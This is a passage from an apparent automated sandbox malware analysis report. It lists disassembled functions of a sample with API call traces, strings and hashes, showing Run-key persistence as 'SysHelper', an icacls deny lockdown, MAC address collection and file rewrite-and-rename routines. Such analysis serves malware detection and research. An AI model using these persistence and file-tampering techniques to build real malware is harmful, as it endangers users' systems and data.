                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F0EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00F0EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F0EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB95
                                                                                                        • _memset.LIBCMT ref: 00F0EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F0EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F0EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F0EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F0EC4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1637485200-213608013
                                                                                                        • Opcode ID: 87bc4c3b02b4f6c65e2855e3140e584e5b36258ac471f03f9442e400f21d5e49
                                                                                                        • Instruction ID: e95e2487d494d0126d34973ac839bdba5ef9c4ea9182605a4de3dc37b2d99cfd
                                                                                                        • Opcode Fuzzy Hash: 87bc4c3b02b4f6c65e2855e3140e584e5b36258ac471f03f9442e400f21d5e49
                                                                                                        • Instruction Fuzzy Hash: AC51A3B1E40209ABEF11DBA0DD46FEEBBB8FB44714F10442AF905B7180D7756A05ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1593 f0e670-f0e697 call f20c62 * 2 1598 f0e6b4-f0e6c2 GetAdaptersInfo 1593->1598 1599 f0e699-f0e6b3 call f21f2d call f20bed 1593->1599 1601 f0e6c4-f0e6d9 call f20bed call f20c62 1598->1601 1602 f0e6db-f0e6e8 GetAdaptersInfo 1598->1602 1601->1599 1601->1602 1603 f0e744-f0e754 call f20bed 1602->1603 1604 f0e6ea-f0e73c call f204a6 call f21f2d * 2 1602->1604 1619 f0e741 1604->1619 1619->1603
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F0E67F
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _malloc.LIBCMT ref: 00F0E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F0E69E
                                                                                                        • _free.LIBCMT ref: 00F0E6A4
                                                                                                          • Part of subcall function 00F20BED: HeapFree.KERNEL32(00000000,00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000), ref: 00F20C01
                                                                                                          • Part of subcall function 00F20BED: GetLastError.KERNEL32(00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000,?,?,?,?,?,00FCB3EC), ref: 00F20C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F0E6B9
                                                                                                        • _free.LIBCMT ref: 00F0E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F0E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F0E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F0E720
                                                                                                        • _wprintf.LIBCMT ref: 00F0E732
                                                                                                        • _wprintf.LIBCMT ref: 00F0E73C
                                                                                                        • _free.LIBCMT ref: 00F0E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F0E71A
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F0E699
                                                                                                        • Address: %s, mac: %s, xrefs: 00F0E72D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                        • Opcode ID: 70217b88eb220b8eb055492249cf06a9c886e4348b492110d034d8dca8e80d62
                                                                                                        • Instruction ID: e79d58273e21891e45f0b390099181a04a113a2202ed784827ddf2dae56757ad
                                                                                                        • Opcode Fuzzy Hash: 70217b88eb220b8eb055492249cf06a9c886e4348b492110d034d8dca8e80d62
                                                                                                        • Instruction Fuzzy Hash: C11124B39445647AD272A2B56C02FFF36DC8F86711F040169FA98D5142EE5D5A0473B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1997 f0fb98-f0fb9f 1998 f0fba0-f0fbb9 1997->1998 1998->1998 1999 f0fbbb-f0fbcf 1998->1999 2000 f0fbd1 1999->2000 2001 f0fbd3-f0fc02 PathAppendW call f18400 1999->2001 2000->2001 2004 f0fc04-f0fc0c call f22587 2001->2004 2005 f0fc0f-f0fc29 2001->2005 2004->2005 2007 f0fc49-f0fc4c 2005->2007 2008 f0fc2b-f0fc2f 2005->2008 2011 f0fc4f-f0fc6b PathFileExistsW 2007->2011 2010 f0fc31-f0fc47 call f205a0 2008->2010 2008->2011 2010->2011 2013 f0fc6d-f0fc86 call f20c62 2011->2013 2014 f0fcdf-f0fce5 2011->2014 2024 f0fc88 2013->2024 2025 f0fc8a-f0fc9f lstrcpyW 2013->2025 2016 f0fcf0-f0fd07 call f17140 2014->2016 2017 f0fce7-f0fced call f22587 2014->2017 2026 f0fd09 2016->2026 2027 f0fd0b-f0fd20 FindFirstFileW 2016->2027 2017->2016 2024->2025 2028 f0fca1 2025->2028 2029 f0fca3-f0fcdc lstrcatW call f14690 call f0f0e0 call f20bed 2025->2029 2026->2027 2030 f0fd30-f0fd4c 2027->2030 2031 f0fd22-f0fd2d call f22587 2027->2031 2028->2029 2029->2014 2035 f0fd52-f0fd55 2030->2035 2036 f10072-f10076 2030->2036 2031->2030 2041 f0fd60-f0fd6b 2035->2041 2037 f10086-f100a4 2036->2037 2038 f10078-f10083 call f22587 2036->2038 2043 f100b1-f100c9 2037->2043 2044 f100a6-f100ae call f22587 2037->2044 2038->2037 2046 f0fd70-f0fd76 2041->2046 2050 f100d6-f100ee 2043->2050 2051 f100cb-f100d3 call f22587 2043->2051 2044->2043 2052 f0fd96-f0fd98 2046->2052 2053 f0fd78-f0fd7b 2046->2053 2063 f100f0-f100f8 call f22587 2050->2063 2064 f100fb-f1010b 2050->2064 2051->2050 2060 f0fd9b-f0fd9d 2052->2060 2057 f0fd92-f0fd94 2053->2057 2058 f0fd7d-f0fd85 2053->2058 2057->2060 2058->2052 2062 f0fd87-f0fd90 2058->2062 2065 f10052-f10065 FindNextFileW 2060->2065 2066 f0fda3-f0fdae 2060->2066 2062->2046 2062->2057 2063->2064 2065->2041 2069 f1006b-f1006c FindClose 2065->2069 2067 f0fdb0-f0fdb6 2066->2067 2070 f0fdd6-f0fdd8 2067->2070 2071 f0fdb8-f0fdbb 2067->2071 2069->2036 2075 f0fddb-f0fddd 2070->2075 2073 f0fdd2-f0fdd4 2071->2073 2074 f0fdbd-f0fdc5 2071->2074 2073->2075 2074->2070 2076 f0fdc7-f0fdd0 2074->2076 2075->2065 2077 f0fde3-f0fdea 2075->2077 2076->2067 2076->2073 2078 f0fdf0-f0fe71 call f17140 call f15ae0 call f14690 call f13b70 2077->2078 2079 f0fec2-f0fecc 2077->2079 2101 f0fe81-f0fea9 2078->2101 2102 f0fe73-f0fe7e call f22587 2078->2102 2081 f0feda-f0fede 2079->2081 2082 f0fece-f0fed5 call f11ab0 2079->2082 2081->2065 2085 f0fee4-f0ff13 call f14690 2081->2085 2082->2081 2091 f0ff15-f0ff17 2085->2091 2092 f0ff19-f0ff1f 2085->2092 2093 f0ff31-f0ff6a call f15ae0 PathFindExtensionW 2091->2093 2094 f0ff22-f0ff2b 2092->2094 2103 f0ff9a-f0ffa8 2093->2103 2104 f0ff6c 2093->2104 2094->2094 2096 f0ff2d-f0ff2f 2094->2096 2096->2093 2101->2065 2108 f0feaf-f0febd call f22587 2101->2108 2102->2101 2106 f0ffda-f0ffde 2103->2106 2107 f0ffaa 2103->2107 2109 f0ff70-f0ff74 2104->2109 2115 f0ffe0-f0ffe9 2106->2115 2116 f1003a-f10042 2106->2116 2111 f0ffb0-f0ffb4 2107->2111 2108->2065 2113 f0ff76-f0ff78 2109->2113 2114 f0ff7a 2109->2114 2117 f0ffb6-f0ffb8 2111->2117 2118 f0ffba 2111->2118 2120 f0ff7c-f0ff88 call f21c02 2113->2120 2114->2120 2123 f0ffeb 2115->2123 2124 f0ffed-f0fff9 call f21c02 2115->2124 2121 f10044-f1004c call f22587 2116->2121 2122 f1004f 2116->2122 2125 f0ffbc-f0ffce call f21c02 2117->2125 2118->2125 2135 f0ff93 2120->2135 2136 f0ff8a-f0ff8f 2120->2136 2121->2122 2122->2065 2123->2124 2124->2116 2133 f0fffb-f1000b 2124->2133 2125->2116 2140 f0ffd0-f0ffd5 2125->2140 2138 f1000d 2133->2138 2139 f1000f-f10026 call f21c02 2133->2139 2137 f0ff97 2135->2137 2136->2109 2141 f0ff91 2136->2141 2137->2103 2138->2139 2139->2116 2145 f10028-f10035 call f111c0 2139->2145 2140->2111 2143 f0ffd7 2140->2143 2141->2137 2143->2106 2145->2116
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3232302685-0
                                                                                                        • Opcode ID: 77c18a6d376090ec699f8a1dfff0ee5fb2a6f2a68aff4ee6c3f5ecb6d67f0e05
                                                                                                        • Instruction ID: de1ae6cac710b94028ffbd98c618718501e9baf6f6070b82dde0ff8985814bf9
                                                                                                        • Opcode Fuzzy Hash: 77c18a6d376090ec699f8a1dfff0ee5fb2a6f2a68aff4ee6c3f5ecb6d67f0e05
                                                                                                        • Instruction Fuzzy Hash: 68B17F70D00219DBDF20DFA4DC46BDEB7B5BF14308F144069E409AB291EB759A89EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 985 f11cd0-f11d1a call f2f7c0 RegOpenKeyExW 988 f11d20-f11d8d call f2b420 RegQueryValueExW RegCloseKey 985->988 989 f12207-f12216 985->989 992 f11d93-f11d9c 988->992 993 f11d8f-f11d91 988->993 995 f11da0-f11da9 992->995 994 f11daf-f11dcb call f15c10 993->994 999 f11dd1-f11df8 lstrlenA call f13520 994->999 1000 f11e7c-f11e87 994->1000 995->995 996 f11dab-f11dad 995->996 996->994 1006 f11e28-f11e2c 999->1006 1007 f11dfa-f11dfe 999->1007 1002 f11e94-f11f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 f11e89-f11e91 call f22587 1000->1003 1014 f11f36-f11f38 1002->1014 1015 f11f3a-f11f3f 1002->1015 1003->1002 1012 f11e3c-f11e50 PathFileExistsW 1006->1012 1013 f11e2e-f11e39 call f22587 1006->1013 1010 f11e00-f11e08 call f22587 1007->1010 1011 f11e0b-f11e23 call f145a0 1007->1011 1010->1011 1011->1006 1012->1000 1021 f11e52-f11e57 1012->1021 1013->1012 1019 f11f4f-f11f96 call f15c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 f11f40-f11f49 1015->1020 1032 f11f98-f11fa0 1019->1032 1033 f11fce-f11fe9 1019->1033 1020->1020 1027 f11f4b-f11f4d 1020->1027 1022 f11e59-f11e5e 1021->1022 1023 f11e6a-f11e6e 1021->1023 1022->1023 1028 f11e60-f11e65 call f14690 1022->1028 1023->989 1030 f11e74-f11e77 1023->1030 1027->1019 1028->1023 1034 f121ff-f12204 call f22587 1030->1034 1035 f11fa2-f11fa4 1032->1035 1036 f11fa6-f11faf 1032->1036 1038 f11feb-f11fed 1033->1038 1039 f11fef-f11ff8 1033->1039 1034->989 1040 f11fbf-f11fc9 call f15c10 1035->1040 1042 f11fb0-f11fb9 1036->1042 1043 f1200f-f12076 call f15c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 f12000-f12009 1039->1044 1040->1033 1042->1042 1046 f11fbb-f11fbd 1042->1046 1050 f121d1-f121d5 1043->1050 1051 f1207c-f12107 call f2b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1051 1044->1044 1048 f1200b-f1200d 1044->1048 1046->1040 1048->1043 1053 f121e2-f121fa 1050->1053 1054 f121d7-f121df call f22587 1050->1054 1059 f12115-f121a8 call f2b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 f12109-f12110 call f13260 1051->1060 1053->989 1055 f121fc 1053->1055 1054->1053 1055->1034 1064 f121b2-f121b8 1059->1064 1065 f121aa-f121b0 GetLastError 1059->1065 1060->1059 1066 f121c0-f121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D12
                                                                                                        • _memset.LIBCMT ref: 00F11D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F11D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F11DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F11E48
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F11E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F11EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F11EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F11EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F11ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F11EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F11EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F11F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F11F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F11F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F11F8E
                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F1202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F12036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F1204C
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F1206E
                                                                                                        • _memset.LIBCMT ref: 00F12090
                                                                                                        • lstrcpyW.KERNEL32(?,010002FC), ref: 00F120AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F120C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F120CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F120D7
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F120F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F120FC
                                                                                                        • _memset.LIBCMT ref: 00F12120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F12146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F12158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1216D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        • Opcode ID: 75b0ea9ed5a6c70d755f9db131f6b2495528bb81e7e2525188bda73cc56f47eb
                                                                                                        • Instruction ID: b36c8aa8a530a9c08d461c05866b794682494584dec9a728e9d1b739abaac96b
                                                                                                        • Opcode Fuzzy Hash: 75b0ea9ed5a6c70d755f9db131f6b2495528bb81e7e2525188bda73cc56f47eb
                                                                                                        • Instruction Fuzzy Hash: 74E16D71D4021DABDF24DBA0DD4AFEEB7B8BF04704F144069E609E7190EB746A85EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F111C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1067 f111c0-f1121d CreateFileW 1068 f11223-f11232 GetFileSizeEx 1067->1068 1069 f118eb-f118fb 1067->1069 1070 f112a3-f112be VirtualAlloc 1068->1070 1071 f11234 1068->1071 1074 f112c0-f112d5 call f2b420 1070->1074 1075 f1131a-f11331 CloseHandle 1070->1075 1072 f11236-f1123a 1071->1072 1073 f1123c-f11281 CloseHandle call f13100 call f159d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 f11287-f112a2 call f22587 1073->1091 1081 f113b1 1074->1081 1082 f112db-f112de 1074->1082 1083 f113b7-f113ef SetFilePointer 1081->1083 1085 f112e0-f112e3 1082->1085 1086 f112e9-f1130a SetFilePointerEx 1082->1086 1089 f113f5-f1140d ReadFile 1083->1089 1090 f115bf 1083->1090 1085->1081 1085->1086 1087 f11332-f1134d ReadFile 1086->1087 1088 f1130c-f11314 VirtualFree 1086->1088 1087->1088 1092 f1134f-f11354 1087->1092 1088->1075 1093 f11440-f11445 1089->1093 1094 f1140f-f1143f VirtualFree CloseHandle call f12d50 1089->1094 1095 f115c5-f115d9 SetFilePointerEx 1090->1095 1092->1088 1097 f11356-f11359 1092->1097 1093->1090 1099 f1144b-f1146b 1093->1099 1095->1094 1100 f115df-f115eb 1095->1100 1097->1083 1102 f1135b-f11377 call f12c40 call f17060 1097->1102 1104 f11471-f115a8 lstrlenA call f20be4 lstrlenA call f2d8d0 lstrlenA call f0eaa0 call f22110 call f0c5c0 call f12d10 call f12d50 call f0bbd0 call f0bd50 call f13ff0 call f12f70 call f0c070 SetFilePointer 1099->1104 1105 f11718-f117d9 lstrlenA call f20be4 lstrlenA call f2d8d0 lstrlenA call f0eaa0 call f22110 call f0bbd0 call f0bd50 call f12f70 call f0c070 1099->1105 1106 f115ed-f115fc WriteFile 1100->1106 1107 f1160e-f11643 call f130b0 call f12840 1100->1107 1130 f113a7-f113af call f12d50 1102->1130 1131 f11379-f113a6 VirtualFree CloseHandle call f12d50 1102->1131 1182 f117e1-f1182e call f12d50 call f12c40 call f12bf0 call f0cba0 1104->1182 1195 f115ae-f115ba call f12d50 * 2 1104->1195 1105->1182 1106->1094 1111 f11602-f1160b call f22110 1106->1111 1127 f11645 1107->1127 1128 f11647-f1165a WriteFile call f12d50 1107->1128 1111->1107 1127->1128 1128->1094 1144 f11660-f11680 lstrlenA WriteFile 1128->1144 1130->1083 1144->1094 1147 f11686-f116de CloseHandle call f13100 call f159d0 MoveFileW 1144->1147 1162 f116e4-f11717 VirtualFree call f13210 call f12d50 1147->1162 1163 f118a7-f118d3 call f13210 call f12d50 1147->1163 1184 f118e3-f118e6 1163->1184 1185 f118d5-f118dd VirtualFree 1163->1185 1203 f11830-f11832 1182->1203 1204 f1186e-f118a6 VirtualFree CloseHandle call f12d50 * 2 1182->1204 1184->1069 1188 f118e8-f118e9 CloseHandle 1184->1188 1185->1184 1188->1069 1195->1090 1203->1204 1206 f11834-f1185b WriteFile 1203->1206 1206->1204 1208 f1185d-f11869 call f12d50 1206->1208 1208->1095
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F1120F
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F11228
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1123D
                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00F11277
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00F112B1
                                                                                                        • _memset.LIBCMT ref: 00F112C8
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F11301
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F11314
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1131B
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00F11349
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00F11381
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F11388
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00F113E6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00F11409
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F11417
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1141E
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00F11471
                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00F11491
                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00F114CF
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00F1159D
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F115D0
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F115F8
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00F11649
                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F1166B
